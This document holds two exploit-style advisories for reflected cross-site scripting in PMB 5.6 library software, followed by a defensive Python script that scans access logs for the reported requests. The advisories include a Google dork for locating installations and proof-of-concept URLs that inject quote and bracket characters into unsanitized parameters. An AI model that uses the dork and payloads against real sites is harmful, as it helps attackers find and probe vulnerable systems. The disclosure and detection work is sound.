# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Date: 20-04-2020
# Exploit Author: 41-trk (Tarik Bakir)
# Email: tarikbak999[at]gmail.com
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6

-==== Vulnerability ====-

Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php.

-==== POC ====-

http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename=">&critical=1

================================

# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Date: 20-04-2020
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6

-==== Vulnerability ====-

Variable $page isn't properly sanitized in file /opac_css/term_search.php
Variable $id isn't properly sanitized in file /opac_css/ajax.php

-==== POC ====-

http://localhost/[PMB PATH]/opac_css/term_search.php?page='
http://localhost/[PMB PATH]/opac_css/ajax.php?module=ajax&categ=liste_lecture&quoifaire=show_form&id='"

================================
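
A log check for the endpoints and parameters named in the two advisories above, as an added example that is not part of the original advisories or of PMB: it flags requests whose `filename`, `page` or `id` value decodes to quote or angle-bracket characters. The combined access-log format, the `/pmb` install path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint suffix -> parameter the advisories report as unsanitized.
WATCHED = {
    "/admin/sauvegarde/restaure.php": "filename",
    "/opac_css/term_search.php": "page",
    "/opac_css/ajax.php": "id",
}
# Characters that can break out of an HTML attribute or tag context.
MARKUP = re.compile(r"[<>\"'`]")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; "/pmb" stands in for [PMB_PATH].
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Apr/2020:10:00:01 +0000] "GET /pmb/opac_css/term_search.php?page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Apr/2020:10:00:07 +0000] "GET /pmb/opac_css/term_search.php?page=%27 HTTP/1.1" 200 5140',
    '192.0.2.44 - - [20/Apr/2020:10:00:09 +0000] "GET /pmb//admin/sauvegarde/restaure.php?filename=%22%3E&critical=1 HTTP/1.1" 200 830',
    '192.0.2.10 - - [20/Apr/2020:10:00:12 +0000] "GET /pmb/opac_css/ajax.php?module=ajax&categ=liste_lecture&quoifaire=show_form&id=14 HTTP/1.1" 200 910',
    '192.0.2.44 - - [20/Apr/2020:10:00:15 +0000] "GET /pmb/opac_css/ajax.php?module=ajax&categ=liste_lecture&quoifaire=show_form&id=%27%22 HTTP/1.1" 200 912',
]


def suspicious_requests(log_lines):
    """Return (line_no, endpoint, param, decoded_value) for flagged requests."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        path = re.sub(r"/{2,}", "/", url.path)  # the first PoC URL contains '//'
        for suffix, param in WATCHED.items():
            if not path.endswith(suffix):
                continue
            values = parse_qs(url.query, keep_blank_values=True).get(param, [])
            for value in values:  # parse_qs has already percent-decoded these
                if MARKUP.search(value):
                    hits.append((line_no, suffix, param, value))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit shows that such a request was made, not that the response reflected the value; the underlying fix is HTML-encoding these parameters on output in the affected files.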